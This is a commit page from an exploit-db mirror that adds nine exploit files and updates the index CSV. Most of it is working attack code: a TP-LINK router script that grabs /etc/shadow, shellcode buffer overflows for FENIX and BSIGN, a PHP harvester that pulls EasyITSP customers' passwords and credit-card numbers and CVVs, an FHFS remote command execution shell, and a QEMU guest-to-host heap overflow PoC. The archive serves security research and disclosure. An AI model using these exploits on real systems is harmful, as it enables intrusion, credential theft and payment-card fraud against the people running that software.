bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-28

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-08-28 05:02:06 +00:00
parent d7e6c62801
commit cbbb44e659
10 changed files with 497 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -34239,10 +34239,10 @@ id,file,description,date,author,platform,type,port
37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote DoS PoC",2015-08-21,"Shankar Damodaran",windows,dos,21
37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write - MS15-080",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0
37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
@ -34253,7 +34253,7 @@ id,file,description,date,author,platform,type,port
37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0
37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
@ -34294,3 +34294,12 @@ id,file,description,date,author,platform,type,port
37979,platforms/php/webapps/37979.txt,"VicBlog Multiple SQL Injection Vulnerabilities",2012-10-26,Geek,php,webapps,0
37980,platforms/windows/dos/37980.pl,"Microsoft Office Excel Denial of Service Vulnerability",2012-10-11,"Jean Pascal Pereira",windows,dos,0
37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 '.bmp' Denial of Service Vulnerability",2012-10-27,coolkaveh,windows,dos,0
37982,platforms/hardware/remote/37982.pl,"TP-LINK TL-WR841N Router Local File Include Vulnerability",2012-10-29,"Matan Azugi",hardware,remote,0
37983,platforms/php/webapps/37983.php,"EasyITSP 'customers_edit.php' Authentication Security Bypass Vulnerability",2012-10-26,"Michal Blaszczak",php,webapps,0
37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 '.avi' File Local Denial of Service Vulnerability",2012-10-26,Am!r,windows,dos,0
37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 Stack Based Buffer Overflow",2015-08-27,"_ Un_N0n _",windows,dos,0
37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0
37990,platforms/multiple/dos/37990.txt,"QEMU Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0

Can't render this file because it is too large.

46
platforms/hardware/remote/37982.pl Executable file
View file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/56320/info
TP-LINK TL-WR841N router is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the affected device. This may aid in further attacks.
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n is vulnerable; other versions may also be affected.
#TP-LINK TL-WR841N Shadow file grabber#
#built by Pulse matan () madsec co il#
#enjoy#
use LWP::UserAgent;
$host = $ARGV[0];
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host";; };
my $ua = LWP::UserAgent->new;
$ua->timeout(30);
$lfi = "/help/../../../../../../../../etc/shadow";
$url = $host.$lfi;
$request = HTTP::Request->new('GET', $url);
$response = $ua->request($request);
my $html = $response->content;
if($html =~ /root/) {
print "root$' \n" ;
}

48
platforms/linux/local/37987.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: fenix - development environment for making 2D games
# Tested on: GNU/Linux - Kali Linux 2.0
#
# Description: FENIX v0.92 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://fenix.divsite.net/
# Kali Linux 2.0 package: http.kali.org_kali_dists_sana_main_binary-i386_Packages
# MD5: 38bc1c509eb023c24a58cda0c5db19d9
import os,subprocess
def run():
try:
print "# FENIX v0.92 Stack-BoF by Juan Sacco"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*4
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*254
eip = "\x44\xd2\xff\xbf"
subprocess.call(["fenix-fxi", junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "FENIX not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit FENIX v0.92 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()

47
platforms/linux/local/37988.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: bsign - embed and verify secure hashes and digital signatures
# Tested on: GNU/Linux - Kali Linux 2.0
#
# Description: BSIGN v0.4.5 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.debian.org
# Kali Linux 2.0 package: http.kali.org_kali_dists_sana_main_binary-i386_Packages
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
import os,subprocess
def run():
try:
print "# BSIGN v0.4.5 Stack-BoF by Juan Sacco"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*8
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*248
eip = "\x10\xd3\xff\xbf"
subprocess.call(["bsign -f",'-f ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "BSIGN not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit BSign 0.4.5 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()

119
platforms/multiple/dos/37990.txt Executable file
View file

@ -0,0 +1,119 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=419#c4
The programmable interrupt timer (PIT) controller in QEMU does not correctly validate the channel number when performing IO writes to the device controller, allowing both an information disclosure and heap-overflow within the context of the host.
Depending on the layout of the data beyond the heap allocation, this vulnerability can set various bytes just beyond the heap allocation to non-attacker controlled values (mainly zero), as well as leaking various bytes from beyond the heap allocation back to the guest.
== Detail ==
The vulnerable function and relevant structures are given below:
typedef struct PITChannelState {
int count; /* can be 65536 */
uint16_t latched_count;
uint8_t count_latched;
uint8_t status_latched;
uint8_t status;
uint8_t read_state;
uint8_t write_state;
uint8_t write_latch;
uint8_t rw_mode;
uint8_t mode;
uint8_t bcd; /* not supported */
uint8_t gate; /* timer start */
int64_t count_load_time;
/* irq handling */
int64_t next_transition_time;
QEMUTimer *irq_timer;
qemu_irq irq;
uint32_t irq_disabled;
} PITChannelState;
typedef struct PITCommonState {
ISADevice dev;
MemoryRegion ioports;
uint32_t iobase;
PITChannelState channels[3];
} PITCommonState;
static uint64_t pit_ioport_read(void *opaque, hwaddr addr,
unsigned size)
{
PITCommonState *pit = opaque;
int ret, count;
PITChannelState *s;
addr &= 3;
s = &pit->channels[addr];
if (s->status_latched) {
s->status_latched = 0;
ret = s->status;
} else if (s->count_latched) {
switch(s->count_latched) {
default:
case RW_STATE_LSB:
ret = s->latched_count & 0xff;
s->count_latched = 0;
break;
case RW_STATE_MSB:
ret = s->latched_count >> 8;
s->count_latched = 0;
break;
case RW_STATE_WORD0:
ret = s->latched_count & 0xff;
s->count_latched = RW_STATE_MSB;
break;
}
} else {
switch(s->read_state) {
default:
case RW_STATE_LSB:
count = pit_get_count(s);
ret = count & 0xff;
break;
case RW_STATE_MSB:
count = pit_get_count(s);
ret = (count >> 8) & 0xff;
break;
case RW_STATE_WORD0:
count = pit_get_count(s);
ret = count & 0xff;
s->read_state = RW_STATE_WORD1;
break;
case RW_STATE_WORD1:
count = pit_get_count(s);
ret = (count >> 8) & 0xff;
s->read_state = RW_STATE_WORD0;
break;
}
}
return ret;
}
By specifying the value of addr to be IOPORT_PIT_CHANNEL0+3, the value of "addr & 3" will be set to 3. This is then used as a array index into s->channels, however since C array-indexes are zero-based (i.e. array[3] points to the fourth element of an array), and there are only three channels in the "PITCommonState.channels" field, this causes the "s" variable to point just beyond the bounds of the "PITChannelState" heap allocation.
What happens next is heavilly dependent on the bytes present beyond the heap allocation.
Firstly, the "s" variable - invalidly pointing beyond the heap allocation - dereferences the value "status_latched". If this value is non-zero, the host leaks the value held at "s->status" back to the guest, and triggers a relative write beyond bounds by setting a zero byte beyond the heap allocation at "s->status_latched".
If the value is zero - or if the vulnerability is triggered a second time - the value at "s->count_latched" is inspected. If it is non zero, the function can either leak the low, high, or both bytes of "s->latched_count" back to the guest, as well as causing "s->count_latched" to be set to zero.
If s->count_latched is also zero - or if the vulnerability is triggered a third time - the value at s->read_state is finally read. Depending its value, and the value of s->mode, this method can leak the low, high or both bytes of s->count back to the guest, and can cause the byte corresponding to s->read_state to be invalidly set to zero.
== PoC ==
Triggering this vulnerability from the context of a guest machine (running in Ring-0 in the guest VM) is simple:
#define IOPORT_PIT_CHANNEL0 0x40
void kmain()
{
uint8_t hostleaked;
size_t i;
for(i = 0; i < 6; i++)
{
// trigger write-beyond-bounds and host leak:
hostleaked = __inb(IOPORT_PIT_CHANNEL0 + 3);
}
}

115
platforms/php/webapps/37983.php Executable file
View file

@ -0,0 +1,115 @@
source: http://www.securityfocus.com/bid/56321/info
EasyITSP is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and gain unauthorized access to customer's information.
EasyITSP 2.0.2 is vulnerable; other versions may also be affected.
<?php
error_reporting(0);
$arguments = getopt("a:b:c:");
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."\n";
echo '## Discovery users with passwords '."\n";
echo '## '."\n";
echo '## Author: Michal Blaszczak '."\n";
echo '## Website: blaszczakm.blogspot.com '."\n";
echo '## Date: 10.10.2012 '."\n";
echo '## '."\n";
echo '## Greatz: cond, packet, jestemka1pi, sid, chez '."\n";
echo '## #pakamera@freenode '."\n";
echo '## (old) #2600@ircnet '."\n";
echo '## (old) #mamo_mamo_jestem_chakerem@ircnet '."\n";
echo '## '."\n";
echo '## Usage: '."\n";
echo '## php exploit.php -a URL -b ID_START -c ID_STOP '."\n";
echo '## '."\n";
echo '## Example: '."\n";
echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b
5 -c 10'."\n";
exit;
}
$url2='customers_edit.php?currentpage=customers';
$url.=$url2;
for ($id_pod; $id_pod <= $id_end; $id_pod++) { $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' .
urlencode($id_pod);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metod. post curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $intro = curl_exec($ch); curl_close($ch);
$regex_login = '#\<td title="Customer username for
portal"\>(.+?)\<\/td\>#s';
preg_match($regex_login, $intro, $login);
$regex_pass = '#\<td title="Customer password for portal"><input
type="password" name="password" required="1" maxlength="45"
value="(.+?)"\>\<\/td\>#s';
preg_match($regex_pass, $intro, $pass);
$regex_ccnum = '#\<td title="Customer cc number"><input type="text"
name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccnum, $intro, $ccnum);
$regex_ccexpire = '#\<td title="Customer cc expire"><input type="text"
name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccexpire, $intro, $ccexpire);
$regex_cccvv = '#\<td title="Customer credit card CVV"><input
type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_cccvv, $intro, $cccvv);
$test = explode(" ",$login[1]);
if(trim($test[0])!='</td>')
{
echo 'ID:'.$id_pod."\n";
echo 'LOGIN:'.$login[1]."\n";
echo 'Password:'.$pass[1]."\n";
echo 'CCnumber:'.$ccnum[1]."\n";
echo 'CCexpire:'.$ccexpire[1]."\n";
echo 'CCCVV:'.$cccvv[1]."\n\n";
}
}
?>

31
platforms/php/webapps/37989.txt Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: IP.Board 4.X Stored XSS
# Date: 27-08-2015
# Software Link: https://www.invisionpower.com/
# Exploit Author: snop.
# Contact: http://twitter.com/rabbitz_org
# Website: http://rabbitz.org
# Category: webapps
1. Description
A registered or non-registered user can create a calendar event
including malicious JavaScript code who will be permanently stored in
the pages source.
2. Proof of Concept
http://URL_TO_FORUM/calendar/submit/?calendar=1
POST:
Affected Paramter: event_location[address][]
3. Solution
Update to version 4.0.12.1
https://community.invisionpower.com/release-notes/40121-r22/
Disclosure Timeline
27.07.15: Vendor notified
05.08.15: Fix released
27.08.15: Public disclosure

22
platforms/windows/dos/37984.pl Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/56322/info
KMPlayer is prone to a local denial-of-service vulnerability.
An local attacker can exploit this issue to crash the affected application, denying service to legitimate users.
KMPlayer 3.0.0.1440 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home : http://IrIsT.Ir/forum/
#tested : XP
#TNX : Alireza , C0dex , B3hz4d
my $po="\x46\x02\x00\x00";
open(C, ">:raw", "poc.avi");
print $po;
close(C);

20
platforms/windows/dos/37986.txt Executable file
View file

@ -0,0 +1,20 @@
********************************************************************************************
# Exploit Title: Xion Audio Player build 155 Stack Based BOF.
# Date: 8/19/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.xionplayer.com
# Software Link: http://www.xionplayer.com/page/download
# Version: 1.5 (Build 155)
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'Xion.exe'.
2- Drag the malformed MP3 file into Xion Audio Player.
~ Software will Crash.
[Creating Malformed MP3 File?]:
>Replace the details of the legit MP3 file with large number of "A"s or any other random value.
**********************************************************************************************

35
platforms/windows/remote/37985.py Executable file
View file

@ -0,0 +1,35 @@
#!/usr/bin/python
#
# FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
#
# Author: Naser Farhadi
#
# Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit)
#
# Link : http://sourceforge.net/projects/fhfs/
#
# Description : FHFS is a FTP and HTTP Web Server package,
# transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,
# good for schools, businesses, etc. whose students/employees need to easily transport files.
# Usage:
# chmod +x FHFS.py
# ./FHFS.py
#
# Video: http://youtu.be/ch5A2bQEB0I
##
import socket
url = raw_input("Enter URL : ")
try:
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((url, 80))
cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
req = "GET /?{.exec|"+cmd+".}"
req += " HTTP/1.1\r\n\r\n"
sock.send(req)
sock.close()
print "Done!"
except KeyboardInterrupt:
print "Bye!"